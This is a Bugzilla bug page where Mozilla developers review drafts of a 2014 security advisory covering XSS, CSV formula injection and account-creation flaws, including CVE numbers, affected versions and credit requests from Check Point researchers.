Closed Bug 1072497 Opened 10 years ago Closed 10 years ago

Security advisory for Bugzilla 4.5.6, 4.4.6, 4.2.11, and 4.0.15

Categories

(Bugzilla :: Documentation, defect)

Product:
Bugzilla
Component:
Documentation
Version:
4.5.6
Type:
defect
Priority:
Not set
Severity:
blocker

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: dkl, Assigned: dkl)

References

Details

Attachments

(1 file, 6 obsolete files)

sec_adv_4.0.14.txt
4.06 KB, text/plain
Details
One or more security fixes exists for Bugzilla 4.5.6, 4.4.6, 4.2.11, and 4.0.15 and will need a security advisory.
I assume you'll want CVE numbers for the two "depends on" bugs?
(In reply to Daniel Veditz [:dveditz] from comment #1) > I assume you'll want CVE numbers for the two "depends on" bugs? Yes please. Thanks!
Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO IMO, not a Bugzilla bug.
(In reply to Frédéric Buclin from comment #3) > Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO > IMO, not a Bugzilla bug. I was just wondering the same thing. Dan/Curtis, thoughts?
Attached file sec_adv_4.0.14.txt (obsolete) —
Attachment #8497238 - Flags: review?(LpSolit)
Comment on attachment 8497238 [details] sec_adv_4.0.14.txt > field values can be intepreted as formulas which can be executed interpreted >CVE Number: CVE-2014-1571) Extra ')'
(In reply to Reed Loden [:reed] from comment #6) > Comment on attachment 8497238 [details] > sec_adv_4.0.14.txt > > > field values can be intepreted as formulas which can be executed > > interpreted > > >CVE Number: CVE-2014-1571) > > Extra ')' Thanks Reed. Changed in my local copy.
Depends on: CVE-2014-1572
(In reply to Daniel Veditz [:dveditz] from comment #1) > I assume you'll want CVE numbers for the two "depends on" bugs? Dan, we will also need a CVE for bug 1074812 I think. dkl
(In reply to Reed Loden [:reed] from comment #4) > (In reply to Frédéric Buclin from comment #3) > > Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO > > IMO, not a Bugzilla bug. > > I was just wondering the same thing. Dan/Curtis, thoughts? as Dan says in comment 9 https://bugzilla.mozilla.org/show_bug.cgi?id=1054702#c9 "It doesn't matter whose bug it is, bugzilla is used by folks in environments with those very common programs and the combination can result in harm. That makes it a security bug."
For bug 1074812, please credit them as "Check Point Vulnerability Research", as per their request.
Attached file sec_adv_4.0.14_2.txt (obsolete) —
Attachment #8497238 - Attachment is obsolete: true
Attachment #8497238 - Flags: review?(LpSolit)
Attachment #8497722 - Flags: review?(LpSolit)
Comment on attachment 8497722 [details] sec_adv_4.0.14_2.txt >* The 'realname' parameter is not correctly filtered on user account > creation, leading to user data override. This issue is by far the most critical of the three. That's why I would mention it first. >Class: Social Engineering >Versions: 3.7.1 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5 CSV export has been implemented in 2.17.1, see bug 12282. >Class: Information Leak >Versions: 3.7.1 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5 Same here, 2.17.1 and newer, see bug 179582. >Class: Unauthorized Account Creation >Versions: 2.23.3 to 3.4.14, 3.5.1 to 3.6.13, 3.7.1 to 4.0.14, 4.1.1 to 4.2.10, As 3.x branches haven't been fixed (as they are now closed), you should write: 2.23.3 to 4.0.14, ... > requested. The overridden login name could be automatically be added s/be added/added/ >The fixes for these issues are included in the 4.0.14, 4.2.10, 4.4.5, and 4.5.5 Those are old versions. >The Bugzilla team wish to thank the following people/organizations for >their assistance in locating, advising us of, and assisting us in fixing >these issues: > >Simon Green >Byron Jones >James Kettle >Check Point Vulnerability Research Please also Matt Tyson who helped with backports for bug 1064140, and LpSolit and dkl who fixed/reviewed bug 1074812.
Attachment #8497722 - Flags: review?(LpSolit) → review-
Depends on: CVE-2014-1573
(In reply to Frédéric Buclin from comment #12) > Comment on attachment 8497722 [details] > sec_adv_4.0.14_2.txt Fixed all of these locally but holding off on new revision as it will be likely changing with the new fixes being included in this release.
Attached file sec_adv_4.0.14_3.txt (obsolete) —
Attachment #8497722 - Attachment is obsolete: true
Attachment #8498978 - Flags: review?(LpSolit)
The Check Point guys suggested to me that they'd like to coordinate on the advisory text. dkl: can you either CC them here, or make contact with them about that? Gerv
>Vulnerability Solutions >======================= > >The fixes for these issues are included in the 4.0.15, 4.2.11, 4.4.6, and4.5.6 >releases. Upgrading to a release with the relevant fixes will protect your >installation from possible exploits of this issue. Small nits, should the last sentence be "these issues" instead of "this issue" as there are more than one? Also need a space in the first sentence "and4.5.6". setting need info for :dkl for this and comment 15
Flags: needinfo?(dkl)
Adding checkpoint people to the cc list so they can see the advisory to be sent out on Monday.
Flags: needinfo?(dkl)
Attached file sec_adv_4.0.14_4.txt (obsolete) —
Minor updates.
Attachment #8498978 - Attachment is obsolete: true
Attachment #8498978 - Flags: review?(LpSolit)
Attachment #8499567 - Flags: review?(LpSolit)
Comment on attachment 8499567 [details] sec_adv_4.0.14_4.txt >Bugzilla is a Web-based bug-tracking system used by a large number of >software projects. The following security issue has been discovered >in Bugzilla: s/issue has/issues have/ >* Places were found in the Bugzilla code where cross-site scripting > attacks could be used to access sensitive information. s/Places/Several places/ maybe? >* The 'realname' parameter is not correctly filtered on user account > creation, leading to user data override. s/leading to/which could lead to/ >Class: Cross-Site Scripting >Versions: 2.23.3 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5 AFAICT, all versions of Bugzilla are affected. I just tested with a Bugzilla 2.22.7 installation, and I can reproduce some of the XSS issues. >Description: During a recent audit of the Bugzilla code base, several places > where found where cross-site scripting exploits could occur which s/where found/were found/
Attachment #8499567 - Flags: review?(LpSolit) → review-
Attached file sec_adv_4.0.14_5.txt (obsolete) —
Thanks for the review.
Attachment #8499567 - Attachment is obsolete: true
Attachment #8500086 - Flags: review?(LpSolit)
Comment on attachment 8500086 [details] sec_adv_4.0.14_5.txt r=LpSolit
Attachment #8500086 - Flags: review?(LpSolit) → review+
Attached file sec_adv_4.0.14.txt (obsolete) —
Changes based on email requests from Shahar Tal of Checkpoint Software. The suggestions made sense so I decided to incorporate where I could. Please review this version asap. -- Email -- Hi David, First, let me thank you for handling the vulnerability report in a professional manner, I wish all project owners were as focused and responsive as you guys. I’ve got a couple of comments regarding the advisory text (as a research group this public attribution is important to us both internally and externally, hence the attention to detail), 1. We reconsidered our credit phrasing, please make sure to credit “Netanel Rubin of Check Point Vulnerability Research”. 2. I know that the XSS bugs were found by Bugzilla developers, however if I understand correctly this audit was triggered by our report – this is not reflected by the text. It would be appropriate to mention that. 3. Similarly, the CVE number is mentioned as assigned to the XSS bugs, however you did assign it to the user account creation bug as well. It would be best if you decided to separate the issues into different CVE numbers, but if you choose not to, please mention the CVE number for our reported bug as well. (we count CVEs as yearly goals, so you can understand my request) 4. I find the account creation bug more severe than the XSSs, would you be kind as to making that the first item in the list? (again, I wouldn’t ask if this wasn’t helpful for us) Thanks so much for your time, Let me know if you have an issue with any of the above or if you need anything else, Shahar Tal Vulnerability Research Check Point Software Technologies | ( +972-3-753-4536 | M +972-545-888887 | * shahartal@checkpoint.com
Attachment #8500086 - Attachment is obsolete: true
Attachment #8500201 - Flags: review?(LpSolit)
"CVS/bzr" We _really_ need to convert the website to tell people about git. Gerv
(In reply to Gervase Markham [:gerv] from comment #23) > We _really_ need to convert the website to tell people about git. Not yet. It was decided several months ago to mention git only once 5.0 was released.
Attached file sec_adv_4.0.14.txt
changed CVEs for original report and XSS report.
Attachment #8500201 - Attachment is obsolete: true
Attachment #8500201 - Flags: review?(LpSolit)
Attachment #8500534 - Flags: review?(LpSolit)
Sec advisory pushed to website and emailed to: bugtraq announce@bugzilla.org support-bugzilla@lists.mozilla.org dkl
Status: ASSIGNED → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Group: bugzilla-security
Attachment #8500534 - Flags: review?(LpSolit)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: